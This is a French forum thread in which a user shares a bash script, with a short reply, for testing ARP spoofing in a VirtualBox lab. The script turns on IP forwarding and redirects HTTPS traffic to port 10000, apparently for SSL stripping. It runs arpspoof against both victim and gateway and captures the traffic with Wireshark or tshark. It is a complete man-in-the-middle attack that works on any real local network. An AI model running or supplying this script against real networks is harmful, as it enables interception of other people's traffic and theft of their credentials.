Vous n'êtes pas identifié(e).
Suite à un post sur backtrack-fr (malheureusement plus disponible) je poste la modification du script initial qui permet de tester l'arp spoofing sur un réseau virtuel créé à l'aide de virtualbox
Le réseau virtuel est en mode bridge la machine attaquante à l'IP 192.168.1.11 et utilise arpspoof et wireshark et la machine victime l'IP 192.168.1.12
#!/bin/bash
red='\e[0;31m'
NC='\e[0m'
if [ `whoami` != root ]
then
echo -e "$red Error:$NC Vous devez être root pour pouvoir exécuter ce script !"
exit 1
fi
if [[ `cat /proc/sys/net/ipv4/ip_forward` == "0" ]]
then
echo 1 > /proc/sys/net/ipv4/ip_forward
fi
interface=$(/usr/bin/ip route show | awk '(NR == 2) {print $3}')
ipbox=$(/usr/bin/ip route show | awk '(NR == 1) {print $3}')
read -p "Écrivez l'ip de la victime: " ipvictime
if ping -c 1 $ipvictime | grep "Unreachable" > /dev/null 2>&1
then
echo -e "$red Error:$NC La victime est injoignable"
exit
else
echo "La victime est connectée"
fi
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 10000
iptables -A FORWARD -j ACCEPT
xterm -e arpspoof -i $interface -t $ipvictime $ipbox &
xterm -e arpspoof -i $interface -t $ipbox $ipvictime &
wireshark -i $interface -k
echo "presser une touche pour remettre à 0 l'ip forwarding"
read reset
echo 0 > /proc/sys/net/ipv4/ip_forward
Attaquant
Victime
On remarque tout de même que lors d'un ping le spoofing arp est détecté.
wireshark -i $interface -k
Peut aussi être remplacé par
read outputfile
tshark $interface -w $outputfile.cap
== Voir aussi ==
** (fr) * http://fr.wikipedia.org/wiki/Address_Re … n_Protocol
Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D
Hors ligne
merci pour le script .
>> Good things come to those who, Wait.. <<
>> sip:yzeew@ekiga.net << and >> #Pouni3 <<
Hors ligne